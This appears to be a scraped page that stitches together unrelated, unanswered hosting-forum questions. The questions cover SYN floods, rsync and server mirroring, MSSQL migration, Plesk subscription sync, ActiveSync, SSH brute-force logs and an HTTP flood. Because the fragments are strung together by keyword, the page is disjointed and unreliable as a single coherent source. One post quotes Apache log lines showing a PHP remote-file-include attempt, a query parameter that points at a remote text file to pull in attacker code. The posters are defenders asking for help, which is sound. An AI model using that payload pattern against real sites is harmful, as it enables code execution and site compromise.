How To Block Sync Attack
Jul 21, 2007
Is it possible to block sync attack?
My server is under DDoS attack. It's getting more than 1000 SYN_RECV requests. Please let me know how I can protect my server from it.
How to block the following "WEB-PHP remote include path" attack using mod_security.
I have tried using the default Mod_Security and also Mod_Security from [url]
But it seems that mod_security is not functioning well, as the PHP inject script is still able to run on my server.
The following is the WEB-PHP remote include path that I mentioned, taken from the Apache access log.
=================================
127.0.0.1 - - [15/Jun/2008:15:09:02 +0800] "GET /?path_escape=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
127.0.0.1 - - [15/Jun/2008:15:18:30 +0800] "GET /?path_escape=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473 ....
I have written a shell script that uses public keys to sync data between some servers. The problem is that moving about 20 GB from one server to another is consuming too much CPU, about 80%. Is this normal? Should I use nice -n +number scp -p bla bla bla.. as syntax to try to get a lower CPU usage?
I'm using RHEL 5.3 on both boxes.
Anyone having difficulties getting this to work? Can't seem to get mail to sync even after the config says everything should be working.
I have a web app that uses MSSQL Server 2005 as its DB.
I am moving this web app to a new server (new IP addresses).
Once the DNS propagation is complete, I need to then synchronize the data between the old DB/server and the new DB/server.
How to sync two MSSQL 2005 DBs?
Or is there another migration technique? (my hoster won't do any IP forwarding in their hardware)
We want to build a file server in our office - either Windows or Linux (doesn't make a difference to us).
We have a lot of satellite offices, and want to have certain computers have access to specific files/folders on the fileserver.
The catch is this... we would like some of our satellite computers to "sync" with the files/folders on the fileserver.
For example, a developer who is constantly working with a particular client, will always want his/her files to sync up with what is on the server.
The developer will want to work with a local copy of the files, and once finished, will upload them to the file server.
A few days go by, and there is a possibility the fileserver has additional information for that client. The developer would then want to download the changed files from the fileserver.
The benefit of working with local files, is that it is quicker to make changes. We can always leave the desktop on overnight to sync between the fileserver and the desktop.
Any suggestions what to look into here?
All of our desktops are on Windows, so we would need a Windows application that has this functionality.
Rsync seems to be the closest thing I've found so far.
We are in the process of replacing our site & hardware (all co-located servers) and moving to a five server config with 2 Apache servers, 2 MySQL servers and a stage server (where pages are prepared). The Apache servers utilise mod_proxy_balancer and a PHP/MySQL script to connect to either of the MySQL servers which replicate with each other.
The bit I am a bit stuck on is keeping both the Apache servers in sync with each other in terms of files (pages & images) - has anyone got any suggestions that could help with this?
Ideally, the images would be placed on the stage server and automatically copied to the 2 Apache servers. I did have one idea which was to put the images on one of the MySQL servers and use that as a file store but then if that goes down, we are in the poo so to speak.
I want to run Rsync to sync a folder from an FTP server - which I have limited access to with my server.
1. Do I have to have rsync installed on the server with the FTP too, as I won't be able to do that as it is not my server.
2. Is Rsync easy enough to get up and running and set it to run every 24 hours?
I receive the error when ClientExec is trying to send email in my rejectlog...
2007-01-28 20:53:17 SMTP protocol synchronization error (input sent without waiting for greeting): rejected connection from H=[255.255.255.255] input="EHLO host.domain.net
HELO host.domain.net
"
I added host.domain.net and 255.255.255.255 to the whitelist files and added this ACL to exim.conf after begin acl:
acl_check_connect:
  accept hosts=255.255.255.255
         control=no_enforce_sync
  accept hosts=host.domain.net
         control=no_enforce_sync
  accept
If it matters, I am running CentOS4 64-bit, DirectAdmin, Kernel 2.6.18
I have two Plesk servers running on CentOS. If one server goes down, I want the 2nd to start serving requests to clients. But data should be synced from the first server to the 2nd server, or we can say the 2nd will be a 100% replica of the first. So if one server goes down, the 2nd will start serving the data that users require, like databases, emails and web requests.
When I try to unlock a subscription I get the following error message. The fact is that I have not customized any parameter of this subscription at any time, but it has blocked me.
ERROR: Call to a member function isDefault() on a non-object (Domain.php:966)
I'm using Plesk 12 Web Pro Edition. I would like to know how I can sync my customers with WHMCS. I have configured the Plesk server (at WHMCS, module version Plesk 10/11) according to WHMCS. But I still get an error and cannot sync users, domains, etc. from Plesk Web Pro to WHMCS.
I'm looking for a method to basically clone my Plesk site to another hosting provider also running Plesk. The idea is that if my site A is down, I can just re-point the DNS entry to Site B, and minimize downtime.
It makes sense to me to pay 2x hosting costs so I can have a site mirrored in case the main site goes offline, then I can just switch the dns to the new host. The trick is how can I automatically keep Site B mirrored as part of site A. Using Plesk Backup doesn't seem practical as it's not automatic. Does Cpanel have a site mirroring feature?
Would something like rsync work? Doesn't this require shell access? I'm looking for best practices to be able to mirror Site A to Site B in an automatic method..
I have a 'Service Plan' which has 270 subscriptions associated with it. When I navigate to 'Service Plans' page, underneath my plan it reads "Unable to sync subscriptions with the service plan" along with a yellow exclamation mark.
If I go into the plan there is another message near the "Update & Sync" button stating that syncing will take time and therefore be run in the background. When I click the "Update & Sync" button nothing appears to happen. If I then click on the plan again, as if to edit the settings I get the following "Warning: Subscriptions are currently syncing with the service plan. Please wait until the sync process is finished." and it prevents me from accessing the plan settings.
If I wait a while, I can eventually get into the plan settings again, which should mean that the Update & Sync has completed. However the "Unable to sync subscriptions with the service plan" warning is still present under my custom plan on the 'Service Plans' page and if I navigate to a subscription to check if it has been updated it hasn't.
If I change the subscription plan to another plan and then change it back to my original plan again, then the changes are reflected. But this is obviously a workaround.
Why doesn't the "Update & Sync" button do as it should?
Why is my plan "Unable to sync subscriptions with the service plan"?
I have a subscription and I'm able to switch the subscription to a given service-plan, but I'm unable to sync the subscription with the plan, using the CLI. These are my commands:
/usr/local/psa/bin/subscription --switch-subscription <domain.com> -service-plan Hosting
result => The subscription <domain.com> is now associated with the service plan Hosting.
When watching the web interface in Plesk, I see the domain is "connected" to the service plan, so far so good. However, I notice that the subscription is not synced.
Back to the CLI, I've tried some combinations, but I can't get the subscription synced. The web-based interface keeps telling me that the subscription is unsynced. Here is what I've tried:
/usr/local/psa/bin/subscription --sync-subscription <domain.com>
And I also unlocked it (just in case it was locked) like so: /usr/local/psa/bin/subscription --unlock-subscription <domain.com>
The funny part is that the CLI tells me: "Subscription <domain.com> was synchronized with the associated service plans." but unfortunately it's not if I look through the GUI. Only if I click the web-based sync option does the subscription get synced. We have to transfer over 1000 domains and need to sync these domains with a given service plan.
I have recently started using the slave DNS manager in the Plesk extension library. I've found that even for DNS zones that are switched off in Plesk, failed sync/transfers still try to take place between the slave and master. Why is this so?
Shouldn't turning the DNS functionality off in Plesk remove the zone from the slave DNS server?
When a domain's DNS functionality is turned off, it removes the zone info from the master, but no command is issued to remove it from the slave?
Domain that is trying to sync/transfer: example.com
Plesk/Master server: 111.11.11.111
Slave DNS: 222.222.22.222
Code:
May 6 08:51:39 ns2 named[1178]: zone example.com/IN: refresh: unexpected rcode (REFUSED) from master 111.11.11.111#53 (source 0.0.0.0#0)
May 6 08:51:39 ns2 named[1178]: zone example.com/IN: Transfer started.
May 6 08:51:40 ns2 named[1178]: transfer of 'example.com/IN' from 111.11.11.111#53: connected using 222.222.22.222#53166
[Code] ...
I'm using the migrate tool to clone our production server to a backup server.
I'm using the following command
Code:
cd /opt/psa/bin/
./migrate --migrate-server -host x.x.x.x -password mypwd
I've noticed that the per-domain PHP settings (like open_basedir and include_path) are not transmitted to the backup server. Is that the expected behavior? I would have preferred the migrate tool to include all settings....
I was trying to get Active Sync running on my Windows Server 2008 R2 to be able to sync calendars, address books etc. with my mobile, without success. With a Linux server it seems to be "easy" to change, as posted here: [URL]...
Need getting Active Sync running on my Windows machine? According to the steps in the mentioned post, I failed very early.
1. check
2. I changed the following files: =>
"C:inetpubvhostswebmailhordeconfigconf.php"
"C:ParallelsPleskWebmailhordehordeconfigconf.php"
"C:ParallelsPleskWebmailhordehordeconfigconf.php.plesk"
with the values: =>
$conf['auth']['admins'] = array(my mail account);
$conf['activesync']['enabled'] = true;
$conf['activesync']['version'] = '14.1';
3. Rewrite:
here the "problems" start, as of course I don't have the nginx option the question is, where to place the rewrite-rules best?
4. check
5. don't know what to do here, if it even is a problem with the max connections to the imap server?
6. I can restart the mailenable service ?
7. as I have admin rights in horde now, I could do step 7!
That's it? I can't use the active sync features ...
Quote:
Mar 10 20:17:55 host kernel: printk: 102 messages suppressed.
Mar 10 20:17:56 host kernel: printk: 3 messages suppressed.
Mar 10 20:18:01 host kernel: printk: 98 messages suppressed.
Mar 10 20:18:35 host kernel: printk: 34 messages suppressed.
Mar 10 20:18:51 host kernel: printk: 189 messages suppressed.
Mar 10 20:18:56 host kernel: printk: 195 messages suppressed.
Mar 10 20:19:02 host kernel: printk: 249 messages suppressed.
Mar 10 20:19:06 host kernel: printk: 36 messages suppressed.
Mar 10 20:19:21 host kernel: printk: 3 messages suppressed.
Mar 10 20:19:26 host kernel: printk: 342 messages suppressed.
Mar 10 20:19:31 host kernel: printk: 509 messages suppressed.
Mar 10 20:19:47 host kernel: printk: 54 messages suppressed.
Mar 10 20:19:51 host kernel: printk: 421 messages suppressed.
Mar 10 20:19:56 host kernel: printk: 542 messages suppressed.
Mar 10 20:20:01 host kernel: printk: 785 messages suppressed.
Mar 10 20:20:16 host kernel: printk: 340 messages suppressed.
Mar 10 20:20:21 host kernel: printk: 337 messages suppressed.
Mar 10 20:20:26 host kernel: printk: 430 messages suppressed.
Or is this something else? It's been going on for about 40 minutes. I've seen my load jump to 20, to 100 and back and forth.
I'm sure that I have Trojans and viruses on my server, but every time I contact my company they ask me to pay money and then they will check and scan my server.
So is there any free application which can scan and remove all bad files on my server? I'm looking for free applications to scan the whole server.
My server stopped responding; I couldn't access it via Webmin or SSH, and DNS was not responding, so I had to ask for a reboot and now everything is fine.
Looking at the logs I found this:
Code:
Jul 18 19:23:12 server sshd[18484]: Failed password for root from 61.145.196.117 port 56817 ssh2
Jul 18 19:23:12 server sshd[18485]: Failed password for root from 61.145.196.117 port 60227 ssh2
Jul 18 19:23:13 server sshd[18488]: Failed password for root from 61.145.196.117 port 38038 ssh2
Jul 18 19:23:15 server sshd[18493]: Failed password for root from 61.145.196.117 port 49884 ssh2
Jul 18 19:24:30 server sshd[18497]: Failed password for root from 61.145.196.117 port 37929 ssh2
Jul 18 19:25:06 server sshd[18521]: Did not receive identification string from 61.145.196.117
Jul 18 19:25:09 server sshd[18508]: Did not receive identification string from 61.145.196.117
Jul 18 19:25:14 server sshd[18505]: fatal: Timeout before authentication for UNKNOWN
Jul 18 19:26:00 server sshd[18509]: Did not receive identification string from 61.145.196.117
And searching that IP on Google I found it here: http://www.tcc.edu.tw/netbase/net/in...?fun=240&prd=3
And it is flagged as an SSH attack.
Any ideas why my server stopped working? And how to prevent it?
I'm using CentOS 5.0
I found my site loads slowly; the CPU load is good. I ran this command:
[root@host ~]# netstat -nap |grep SYN |wc -l
526
It seems my server is having a problem with a SYN attack. Is there any way to protect it?
I'm running Apache 2.
My site has been under a prolonged HTTP flood attack since 2 weeks ago. The attack has never stopped, and for the moment I can only mitigate the attack using my own firewall (hardware).
Since my ISP is not interested in helping from upstream, or even in providing any mitigation services, I can only do mitigation at my own source or alternatively use proxy services, but I've chosen to try on my own. I tried one of the well-known mitigation services out there once, but it did not fully satisfy me since most of the legitimate traffic was blocked from their source.
What I can do now is keep staying alive and not go down in whatever situation, even if it becomes worse (but if the attack changes to a UDP attack, I couldn't help myself because there would be high incoming bandwidth into my network). My network was totaling 10MB last time, but since this attack I've been forced to subscribe to 30MB in order to keep balance on the attack.
I've blocked all access except for my country and some other neighbours. If I change the policy to allow all countries, the load of the firewall will become max and after that it will hang in less than a minute. I've done load balancing across 4 servers (8GB memory each) and it seems the condition is getting under control, with a slight problem of server hangs (memory shortage) and very limited keep-alive connections.
Now what I am thinking is to buy a router in order to null route incoming IPs of specific countries, so I can change my firewall policy to allow all connections as well as help the firewall itself release its burden of halting blocked IPs that currently keep hitting it, which might impact its performance.
Which brands of router can do this?
Do you have some other suggestions instead of buying a router?
I am having one issue with one of my highly visited websites, hangibar.com. It's being hosted at SoftLayer, and we are facing SYN attacks too much on this website.
The solution which Microsoft gives on their website is related to a TCP/IP registry entry, but the thing is the same; somewhere some connections increase too much over TCP/IP. For that reason the website becomes very sticky and it stops executing the SQL process. During this issue I have to restart the server to establish a fresh connection.